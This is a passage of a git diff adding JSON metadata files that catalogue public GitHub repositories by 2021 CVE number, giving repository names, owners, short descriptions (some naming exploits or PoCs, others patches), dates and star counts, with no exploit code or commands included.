"https:\/\/avatars.githubusercontent.com\/u\/129803614?v=4", + "html_url": "https:\/\/github.com\/alvaciroliveira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alvaciroliveira\/RpcAuthnLevelPrivacyEnabled", + "description": "Soluciona a CVE-2021-1678 - RpcAuthnLevelPrivacyEnabled", + "fork": false, + "created_at": "2024-05-13T20:19:38Z", + "updated_at": "2024-06-02T01:46:56Z", + "pushed_at": "2024-06-02T01:46:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1699.json b/2021/CVE-2021-1699.json new file mode 100644 index 0000000000..469bc420b3 --- /dev/null +++ b/2021/CVE-2021-1699.json @@ -0,0 +1,33 @@ +[ + { + "id": 353281089, + "name": "CVE-2021-1699", + "full_name": "waleedassar\/CVE-2021-1699", + "owner": { + "login": "waleedassar", + "id": 5983995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4", + "html_url": "https:\/\/github.com\/waleedassar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-1699", + "description": "POC for CVE-2021-1699", + "fork": false, + "created_at": "2021-03-31T08:22:49Z", + "updated_at": "2024-08-12T20:11:42Z", + "pushed_at": "2021-03-31T08:29:23Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1732.json b/2021/CVE-2021-1732.json new file mode 100644 index 0000000000..4abcf75ff9 --- /dev/null +++ b/2021/CVE-2021-1732.json @@ -0,0 +1,405 @@ +[ + { + "id": 344667460, + "name": "CVE-2021-1732-Exploit", + "full_name": "KaLendsi\/CVE-2021-1732-Exploit", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-1732-Exploit", + "description": "CVE-2021-1732 Exploit", + "fork": false, + "created_at": "2021-03-05T02:11:10Z", + "updated_at": "2024-11-25T13:00:33Z", + "pushed_at": "2021-03-05T03:10:26Z", + "stargazers_count": 417, + "watchers_count": 417, + "has_discussions": false, + "forks_count": 130, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 130, + "watchers": 417, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 345537174, + "name": "CVE-2021-1732", + "full_name": "k-k-k-k-k\/CVE-2021-1732", + "owner": { + "login": "k-k-k-k-k", + "id": 36893648, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36893648?v=4", + "html_url": "https:\/\/github.com\/k-k-k-k-k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k-k-k-k-k\/CVE-2021-1732", + "description": "CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发", + "fork": false, + "created_at": "2021-03-08T05:07:15Z", + "updated_at": "2024-11-22T03:14:35Z", + "pushed_at": "2021-03-08T11:41:19Z", + "stargazers_count": 80, + "watchers_count": 80, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 80, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 345855407, + "name": "CVE-2021-1732-Exploit", + "full_name": "oneoy\/CVE-2021-1732-Exploit", + "owner": { + "login": "oneoy", + "id": 38435398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4", + "html_url": "https:\/\/github.com\/oneoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-1732-Exploit", + "description": null, + "fork": false, + "created_at": "2021-03-09T02:13:43Z", + "updated_at": "2024-08-12T20:11:02Z", + "pushed_at": "2021-03-09T02:13:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 353872268, + "name": "CVE-2021-1732_exp", + "full_name": "linuxdy\/CVE-2021-1732_exp", + "owner": { + "login": "linuxdy", + "id": 50064309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50064309?v=4", + "html_url": "https:\/\/github.com\/linuxdy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/linuxdy\/CVE-2021-1732_exp", + "description": null, + "fork": false, + "created_at": "2021-04-02T01:35:41Z", + "updated_at": "2024-08-12T20:11:45Z", + "pushed_at": "2021-03-30T08:32:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 360813608, + "name": "CVE-2021-1732", + "full_name": "Pai-Po\/CVE-2021-1732", + "owner": { + "login": "Pai-Po", + "id": 12437819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12437819?v=4", + "html_url": "https:\/\/github.com\/Pai-Po", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pai-Po\/CVE-2021-1732", + "description": "CVE-2021-1732 poc & exp; tested on 20H2", + "fork": false, + "created_at": "2021-04-23T08:21:54Z", + "updated_at": "2024-11-22T03:14:51Z", + "pushed_at": "2021-04-23T08:28:53Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 67, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 361428612, + "name": "Windows-Privilege-Escalation-CVE-2021-1732", + "full_name": "exploitblizzard\/Windows-Privilege-Escalation-CVE-2021-1732", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/Windows-Privilege-Escalation-CVE-2021-1732", + "description": "Read my blog for more info - ", + "fork": false, + "created_at": "2021-04-25T12:55:15Z", + "updated_at": "2024-08-21T03:39:34Z", + "pushed_at": "2021-04-27T21:13:18Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 409794385, + "name": "CVE-2021-1732", + "full_name": "BeneficialCode\/CVE-2021-1732", + "owner": { + "login": "BeneficialCode", + "id": 40847073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40847073?v=4", + "html_url": "https:\/\/github.com\/BeneficialCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeneficialCode\/CVE-2021-1732", + "description": null, + "fork": false, + "created_at": "2021-09-24T01:28:58Z", + "updated_at": "2024-10-19T07:59:10Z", + "pushed_at": "2021-11-08T01:36:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 451100080, + "name": "CVE-2021-1732-EXP-", + "full_name": "ExploitCN\/CVE-2021-1732-EXP-", + "owner": { + "login": "ExploitCN", + "id": 98264245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2021-1732-EXP-", + "description": "对1909下windows版本的EXP进行分析,并对代码添加调试和注释", + "fork": false, + "created_at": "2022-01-23T12:40:01Z", + "updated_at": "2022-04-12T12:06:58Z", + "pushed_at": "2022-04-12T12:06:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459669290, + "name": "CVE-2021-1732", + "full_name": "r1l4-i3pur1l4\/CVE-2021-1732", + "owner": { + "login": "r1l4-i3pur1l4", + "id": 76409019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4", + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2021-1732", + "description": null, + "fork": false, + "created_at": "2022-02-15T16:55:31Z", + "updated_at": "2022-02-15T17:00:00Z", + "pushed_at": "2022-02-15T16:59:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560416302, + "name": "CVE-2021-1732", + "full_name": "fenalik\/CVE-2021-1732", + "owner": { + "login": "fenalik", + "id": 46825027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46825027?v=4", + "html_url": "https:\/\/github.com\/fenalik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fenalik\/CVE-2021-1732", + "description": "CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发", + "fork": false, + "created_at": "2022-11-01T13:06:17Z", + "updated_at": "2023-06-14T10:36:15Z", + "pushed_at": "2022-11-01T13:07:44Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 611610528, + "name": "CVE-2021-1732", + "full_name": "4dp\/CVE-2021-1732", + "owner": { + "login": "4dp", + "id": 20782978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20782978?v=4", + "html_url": "https:\/\/github.com\/4dp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4dp\/CVE-2021-1732", + "description": "CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发", + "fork": false, + "created_at": "2023-03-09T07:14:45Z", + "updated_at": "2023-04-28T00:26:16Z", + "pushed_at": "2023-03-09T07:15:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660179627, + "name": "CVE-2021-1732", + "full_name": "yangshifan-git\/CVE-2021-1732", + "owner": { + "login": "yangshifan-git", + "id": 59814204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59814204?v=4", + "html_url": "https:\/\/github.com\/yangshifan-git", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yangshifan-git\/CVE-2021-1732", + "description": null, + "fork": false, + "created_at": "2023-06-29T12:23:51Z", + "updated_at": "2023-06-29T12:23:52Z", + "pushed_at": "2023-06-29T12:25:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665029914, + "name": "CVE-2021-1732", + "full_name": "asepsaepdin\/CVE-2021-1732", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-1732", + "description": null, + "fork": false, + "created_at": "2023-07-11T09:29:18Z", + "updated_at": "2023-10-24T09:27:31Z", + "pushed_at": "2023-07-13T04:49:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1748.json b/2021/CVE-2021-1748.json new file mode 100644 index 0000000000..005433296b --- /dev/null +++ b/2021/CVE-2021-1748.json @@ -0,0 +1,64 @@ +[ + { + "id": 401901238, + "name": "itmsBlock", + "full_name": "Ivanhoe76zzzz\/itmsBlock", + "owner": { + "login": "Ivanhoe76zzzz", + "id": 89883330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89883330?v=4", + "html_url": "https:\/\/github.com\/Ivanhoe76zzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ivanhoe76zzzz\/itmsBlock", + "description": "Block \"itms scheme\" \/ fix CVE-2021-1748", + "fork": false, + "created_at": "2021-09-01T02:05:51Z", + "updated_at": "2024-08-12T20:16:04Z", + "pushed_at": "2021-08-31T18:12:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 402914353, + "name": "mistune-patch-backport", + "full_name": "ChiChou\/mistune-patch-backport", + "owner": { + "login": "ChiChou", + "id": 2802045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2802045?v=4", + "html_url": "https:\/\/github.com\/ChiChou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChiChou\/mistune-patch-backport", + "description": "Backporting CVE-2021-1748 patch for iOS <=14.3", + "fork": false, + "created_at": "2021-09-03T22:48:11Z", + "updated_at": "2024-09-23T03:16:22Z", + "pushed_at": "2021-09-03T22:50:08Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1782.json b/2021/CVE-2021-1782.json new file mode 100644 index 0000000000..1544dbe8cc --- /dev/null +++ b/2021/CVE-2021-1782.json @@ -0,0 +1,64 @@ +[ + { + "id": 336072318, + "name": "cve-2021-1782", + "full_name": "raymontag\/cve-2021-1782", + "owner": { + "login": "raymontag", + "id": 106421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4", + "html_url": "https:\/\/github.com\/raymontag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raymontag\/cve-2021-1782", + "description": null, + "fork": false, + "created_at": "2021-02-04T20:19:22Z", + "updated_at": "2023-03-29T09:27:08Z", + "pushed_at": "2021-03-05T21:25:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 337752034, + "name": "CVE-2021-1782", + "full_name": "synacktiv\/CVE-2021-1782", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-1782", + "description": null, + "fork": false, + "created_at": "2021-02-10T14:38:05Z", + "updated_at": "2024-09-15T12:45:05Z", + "pushed_at": "2021-02-10T14:39:04Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 38, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1883.json b/2021/CVE-2021-1883.json new file mode 100644 index 0000000000..2dff977dcc --- /dev/null +++ b/2021/CVE-2021-1883.json @@ -0,0 +1,33 @@ +[ + { + "id": 458042189, + "name": "CVE-2021-1883", + "full_name": "gabe-k\/CVE-2021-1883", + "owner": { + "login": "gabe-k", + "id": 1268745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1268745?v=4", + "html_url": "https:\/\/github.com\/gabe-k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gabe-k\/CVE-2021-1883", + "description": null, + "fork": false, + "created_at": "2022-02-11T04:13:25Z", + "updated_at": "2024-04-28T11:30:18Z", + "pushed_at": "2022-02-11T04:17:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1905.json b/2021/CVE-2021-1905.json new file mode 100644 index 0000000000..397d3aef4e --- /dev/null +++ b/2021/CVE-2021-1905.json @@ -0,0 +1,33 @@ +[ + { + "id": 370174301, + "name": "CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664", + "full_name": "TAKIANFIF\/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664", + "owner": { + "login": "TAKIANFIF", + "id": 50182078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50182078?v=4", + "html_url": "https:\/\/github.com\/TAKIANFIF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAKIANFIF\/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664", + "description": "Qualcomm GPU \/ ARM Mali GPU", + "fork": false, + "created_at": "2021-05-23T23:02:41Z", + "updated_at": "2021-05-23T23:02:41Z", + "pushed_at": "2021-05-23T23:02:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1961.json b/2021/CVE-2021-1961.json new file mode 100644 index 0000000000..4144dcd778 --- /dev/null +++ b/2021/CVE-2021-1961.json @@ -0,0 +1,33 @@ +[ + { + "id": 532269054, + "name": "CVE-2021-1961", + "full_name": "tamirzb\/CVE-2021-1961", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2021-1961", + "description": "Exploit code for CVE-2021-1961", + "fork": false, + "created_at": "2022-09-03T13:31:13Z", + "updated_at": "2024-09-25T07:44:16Z", + "pushed_at": "2022-09-07T11:47:56Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 106, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1965.json b/2021/CVE-2021-1965.json new file mode 100644 index 0000000000..553f67c051 --- /dev/null +++ b/2021/CVE-2021-1965.json @@ -0,0 +1,64 @@ +[ + { + "id": 460881511, + "name": "CVE-2021-1965", + "full_name": "parsdefense\/CVE-2021-1965", + "owner": { + "login": "parsdefense", + "id": 84011175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84011175?v=4", + "html_url": "https:\/\/github.com\/parsdefense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/parsdefense\/CVE-2021-1965", + "description": "CVE-2021-1965 WiFi Zero Click RCE Trigger PoC", + "fork": false, + "created_at": "2022-02-18T14:19:58Z", + "updated_at": "2024-11-15T16:46:27Z", + "pushed_at": "2022-02-19T13:52:32Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 167, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 461350628, + "name": "CVE-2021-1965", + "full_name": "foxtrot\/CVE-2021-1965", + "owner": { + "login": "foxtrot", + "id": 4153572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4153572?v=4", + "html_url": "https:\/\/github.com\/foxtrot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/foxtrot\/CVE-2021-1965", + "description": null, + "fork": false, + "created_at": "2022-02-20T00:52:01Z", + "updated_at": "2023-10-04T16:48:41Z", + "pushed_at": "2022-02-20T01:58:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1994.json b/2021/CVE-2021-1994.json new file mode 100644 index 0000000000..4ebef46862 --- /dev/null +++ b/2021/CVE-2021-1994.json @@ -0,0 +1,33 @@ +[ + { + "id": 335868582, + "name": "weblogic2021", + "full_name": "somatrasss\/weblogic2021", + "owner": { + "login": "somatrasss", + "id": 69829610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4", + "html_url": "https:\/\/github.com\/somatrasss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/somatrasss\/weblogic2021", + "description": "CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109", + "fork": false, + "created_at": "2021-02-04T07:03:56Z", + "updated_at": "2024-08-12T20:10:03Z", + "pushed_at": "2021-09-13T02:58:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20021.json b/2021/CVE-2021-20021.json new file mode 100644 index 0000000000..1b85aa3287 --- /dev/null +++ b/2021/CVE-2021-20021.json @@ -0,0 +1,33 @@ +[ + { + "id": 688571881, + "name": "CVE-2021-20021", + "full_name": "SUPRAAA-1337\/CVE-2021-20021", + "owner": { + "login": "SUPRAAA-1337", + "id": 128395905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4", + "html_url": "https:\/\/github.com\/SUPRAAA-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2021-20021", + "description": null, + "fork": false, + "created_at": "2023-09-07T16:17:41Z", + "updated_at": "2024-03-18T17:53:34Z", + "pushed_at": "2023-09-08T17:11:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20038.json b/2021/CVE-2021-20038.json new file mode 100644 index 0000000000..d079dadfc9 --- /dev/null +++ b/2021/CVE-2021-20038.json @@ -0,0 +1,33 @@ +[ + { + "id": 522394217, + "name": "CVE-2021-20038-SonicWall-RCE", + "full_name": "vesperp\/CVE-2021-20038-SonicWall-RCE", + "owner": { + "login": "vesperp", + "id": 28191544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4", + "html_url": "https:\/\/github.com\/vesperp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vesperp\/CVE-2021-20038-SonicWall-RCE", + "description": null, + "fork": false, + "created_at": "2022-08-08T03:38:06Z", + "updated_at": "2022-08-08T04:56:31Z", + "pushed_at": "2022-08-08T03:41:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20138.json b/2021/CVE-2021-20138.json new file mode 100644 index 0000000000..7d48db09c3 --- /dev/null +++ b/2021/CVE-2021-20138.json @@ -0,0 +1,33 @@ +[ + { + "id": 515147295, + "name": "frameworks_base_AOSP10_r33_CVE-2021-20138", + "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-20138", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-20138", + "description": null, + "fork": false, + "created_at": "2022-07-18T11:01:39Z", + "updated_at": "2022-07-18T11:20:13Z", + "pushed_at": "2022-07-18T11:34:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2021.json b/2021/CVE-2021-2021.json new file mode 100644 index 0000000000..9f195cedd9 --- /dev/null +++ b/2021/CVE-2021-2021.json @@ -0,0 +1,33 @@ +[ + { + "id": 367292787, + "name": "CVE-2021-2021good", + "full_name": "TheCryingGame\/CVE-2021-2021good", + "owner": { + "login": "TheCryingGame", + "id": 48227194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48227194?v=4", + "html_url": "https:\/\/github.com\/TheCryingGame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCryingGame\/CVE-2021-2021good", + "description": "This is a good projects.", + "fork": false, + "created_at": "2021-05-14T08:03:43Z", + "updated_at": "2021-05-14T08:03:43Z", + "pushed_at": "2021-05-14T08:03:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20233.json b/2021/CVE-2021-20233.json new file mode 100644 index 0000000000..0f5f2c99a2 --- /dev/null +++ b/2021/CVE-2021-20233.json @@ -0,0 +1,33 @@ +[ + { + "id": 515707434, + "name": "BootHoleFix", + "full_name": "pauljrowland\/BootHoleFix", + "owner": { + "login": "pauljrowland", + "id": 17676570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17676570?v=4", + "html_url": "https:\/\/github.com\/pauljrowland", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pauljrowland\/BootHoleFix", + "description": "This script will remediate the BootHole bug identified in CVE-2020-25632 and\/or CVE-2021-20233.", + "fork": false, + "created_at": "2022-07-19T18:56:51Z", + "updated_at": "2022-07-19T19:04:26Z", + "pushed_at": "2022-07-19T19:08:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20253.json b/2021/CVE-2021-20253.json new file mode 100644 index 0000000000..24af2ed136 --- /dev/null +++ b/2021/CVE-2021-20253.json @@ -0,0 +1,39 @@ +[ + { + "id": 723466329, + "name": "CVE-2021-20253", + "full_name": "mbadanoiu\/CVE-2021-20253", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-20253", + "description": "CVE-2021-20253: Privilege Escalation via Job Isolation Escape in Ansible Tower", + "fork": false, + "created_at": "2023-11-25T18:56:51Z", + "updated_at": "2023-11-26T12:24:16Z", + "pushed_at": "2023-11-25T19:18:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2021-20253", + 